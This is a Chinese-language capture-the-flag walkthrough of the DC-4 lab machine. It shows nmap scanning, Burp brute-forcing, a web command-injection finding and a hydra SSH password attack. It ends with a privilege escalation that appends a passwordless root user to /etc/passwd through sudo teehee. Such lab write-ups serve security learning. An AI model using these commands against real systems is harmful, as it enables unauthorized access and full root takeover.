封神不問榜,雁過不留痕
實驗環境
VMware Workstation Pro 15
Kali-Linux-2019.2-vmware-amd64
DC_4
1、主機發現
root@kali:~# arp-scan -l
2、端口掃描
root@kali:~# nmap -A -sS -sV -v -p- 192.168.136.137
3、威脅建模
根據上面的信息,我們知道開放了22、80端口,同時知道登錄的賬號爲admin
4、暴力破解
使用burp suite工具進行暴力破解
得到賬戶密碼happy
進行登錄
這裏考慮是否可以執行命令,通過工具burp suite抓包查看下怎麼執行命令的。
重放(“+”表示的是空格)
5、漏洞利用
此處發現存在命令注入漏洞
發現三個用戶,目錄都在家目錄下
將密碼保存在kali中,生成一個字典文件
root@kali:/tmp# vim old_passwords.txt
用戶名也生成一個字典
root@kali:/tmp# vim users_dc4.dic
使用工具-hydra
root@kali:/tmp# hydra -L users_dc4.dic -P old_passwords.txt ssh://192.168.136.137 -vV -o hydra.ssh
得到了jim的密碼,ssh遠程登陸一下
六、權限提升
在jim中發現一封郵件,但是並沒有找到什麼
去郵件文件夾中看看
jim@dc-4:/home/charles$ cd /var/mail/
發現了賬戶charles的密碼,登錄進去麼有發現什麼東西
進行提權
charles@dc-4:~$ sudo -l
發現teehee
在sudo
執行權限時候,不需要root
密碼
查看這個teehee
的幫助手冊
charles@dc-4:~$ teehee --help
teehee
使用-a
參數時候,執行命令追加文件內容,不用進行覆蓋
那麼,可以考慮在/etc/passwd
下追加一個root用戶名??
charles@dc-4:~$ echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
admin::0:0:::/bin/bash
charles@dc-4:~$ su admin